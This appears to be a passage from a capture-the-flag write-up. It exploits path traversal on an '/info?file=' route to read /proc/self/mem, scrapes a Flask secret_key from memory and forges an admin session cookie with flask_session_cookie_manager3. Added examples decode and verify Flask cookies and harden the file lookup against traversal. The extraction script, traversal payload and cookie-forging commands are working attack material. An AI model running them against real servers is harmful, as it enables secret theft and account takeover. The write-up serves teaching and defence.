7f8209037000-7f8209038000 rw-p 00093000 fd:00 23348860 /lib/ld-musl-x86_64.so.1
7f8209038000-7f820903b000 rw-p 00000000 00:00 0
7fff969ea000-7fff96a0b000 rw-p 00000000 00:00 0 [stack]
7fff96a87000-7fff96a8a000 r--p 00000000 00:00 0 [vvar]
7fff96a8a000-7fff96a8c000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

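From this output, take the start and end address of each region and pass them to /proc/self/mem to search for the secret_key. The code is as follows: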

import re
import sys

import requests

# maps.text holds the /proc/self/maps output saved above
with open(file="maps.text", mode='r') as maps_file:
    file_data = maps_file.readlines()

for line in file_data:
    # Only readable and writable regions are searched
    if 'rw' in line:
        addr = re.search('([0-9a-f]+)-([0-9a-f]+)', line)
        start = int(addr.group(1), 16)
        end = int(addr.group(2), 16)
        print(start, end)
        url = f"http://61.147.171.105:59773/info?file=../../../../proc/self/mem&start={start}&end={end}"
        response = requests.get(url)
        # 32 hex characters (the uuid4 without dashes) followed by the fixed suffix
        secret_key = re.findall(r"[a-z0-9]{32}\*abcdefgh", response.text)
        if secret_key:
            print(secret_key)
            sys.exit(0)

This yields the secret_key:

cff65a3817204001ad76ae1e8cb13484*abcdefgh

Next, forge the Flask session. First, use a tool to decode the session stored in the cookie.

Start by taking the cookie value from the request: eyJhZG1pbiI6MH0.ZYgsLg.pV_q1l7XRYFtpUxbQIMozaQ6H5c

python flask_session_cookie_manager3.py  decode -s "cff65a3817204001ad76ae1e8cb13484*abcdefgh" -c "eyJhZG1pbiI6MH0.ZYgsLg.pV_q1l7XRYFtpUxbQIMozaQ6H5c"

Decoding gives {'admin':0}.

The value of admin has to be changed to 1, so the modified session must be encoded into a new cookie, as follows:

python flask_session_cookie_manager3.py  encode -s "cff65a3817204001ad76ae1e8cb13484*abcdefgh" -t "{'admin':1}"

The resulting session value is:

eyJhZG1pbiI6MX0.ZYg81w.EwaiU-aGRzeNiuCeME1rBic-cVI
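
Why the secret_key is the only thing protecting the admin field, as an added example that is not part of the original post or of flask_session_cookie_manager3.py: a Flask session cookie is signed, not encrypted, so its payload and issue time can be read without any key, and only the HMAC depends on SECRET_KEY. The function names are illustrative, and the parameters (salt "cookie-session", HMAC-SHA1) are Flask's defaults.

```python
import base64
import hashlib
import hmac
import json
import zlib
from datetime import datetime, timezone

# Cookie value quoted in the write-up above (payload.timestamp.signature)
PAGE_COOKIE = "eyJhZG1pbiI6MH0.ZYgsLg.pV_q1l7XRYFtpUxbQIMozaQ6H5c"


def _b64d(part):
    """URL-safe base64 decode, restoring the '=' padding Flask strips."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def inspect_cookie(cookie):
    """Return (payload, issue time) of a Flask session cookie without any key."""
    compressed = cookie.startswith(".")   # a leading dot marks a zlib-compressed payload
    body = cookie[1:] if compressed else cookie
    payload_b64, ts_b64, _signature = body.rsplit(".", 2)
    raw = _b64d(payload_b64)
    if compressed:
        raw = zlib.decompress(raw)
    issued = datetime.fromtimestamp(
        int.from_bytes(_b64d(ts_b64), "big"), tz=timezone.utc
    )
    return json.loads(raw), issued


def verify_cookie(cookie, secret_key, salt=b"cookie-session"):
    """Recompute the signature: HMAC-SHA1 over 'payload.timestamp' with a derived key."""
    signed, _, sig_b64 = cookie.rpartition(".")
    derived = hmac.new(secret_key.encode(), salt, hashlib.sha1).digest()
    expected = hmac.new(derived, signed.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, _b64d(sig_b64))


if __name__ == "__main__":
    payload, issued = inspect_cookie(PAGE_COOKIE)
    print("payload readable without the key:", payload)
    print("issued at:", issued.isoformat())
    print("verifies with a wrong key:", verify_cookie(PAGE_COOKIE, "not-the-key"))
```

Because integrity rests entirely on the key, a key that has leaked (here through process memory) has to be rotated, which also invalidates every session issued under it.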

Replace the cookie in the request with the value above and send the request to get the flag:

catctf{Catch_the_c4t_HaHa}
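
The whole chain starts at /info, which appends the file parameter to ./details/ without checking where the result points. A hardened lookup for that route, as an added example (not the challenge's code or the original author's): safe_detail_path and read_slice are hypothetical names, and treating start/end as byte offsets with 0 meaning "to end of file" is an assumption, since cat.py is not shown on the page.

```python
import os
import tempfile

MAX_SLICE = 64 * 1024  # assumed upper bound on bytes returned per request


class UnsafePath(ValueError):
    """Raised when a request must be refused."""


def safe_detail_path(base_dir, requested):
    """Resolve `requested` under `base_dir`; refuse anything that escapes it."""
    if not requested or "\x00" in requested:
        raise UnsafePath("empty name or NUL byte")
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks, so the check is on the real target
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise UnsafePath("resolves outside the details directory")
    if not os.path.isfile(target):
        raise UnsafePath("not a regular file")
    return target


def read_slice(path, start="0", end="0"):
    """Read bytes [start, end) of an already vetted file, capped at MAX_SLICE."""
    try:
        start, end = int(start), int(end)
    except (TypeError, ValueError):
        raise UnsafePath("start/end must be integers")
    size = os.path.getsize(path)
    if start < 0 or end < 0 or start > size:
        raise UnsafePath("offset out of range")
    end = size if end == 0 else min(end, size)
    length = min(max(end - start, 0), MAX_SLICE)
    with open(path, "rb") as fh:
        fh.seek(start)
        return fh.read(length)


def demo():
    """Constructed sample tree: details/tom.txt plus a symlink that points outside."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        details = os.path.join(root, "details")
        os.mkdir(details)
        with open(os.path.join(details, "tom.txt"), "w") as fh:
            fh.write("Tom is a grey cat.")
        with open(os.path.join(root, "app.py"), "w") as fh:
            fh.write("SECRET")
        os.symlink(os.path.join(root, "app.py"), os.path.join(details, "link.txt"))
        requests_seen = ("tom.txt", "../app.py", "../../../../proc/self/mem",
                         "/etc/passwd", "link.txt", "")
        for name in requests_seen:
            try:
                results[name] = read_slice(safe_detail_path(details, name), "0", "3")
            except UnsafePath as exc:
                results[name] = "rejected: " + str(exc)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(repr(name), "->", outcome)
```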
  • Copyrights © 2021-2024 John Doe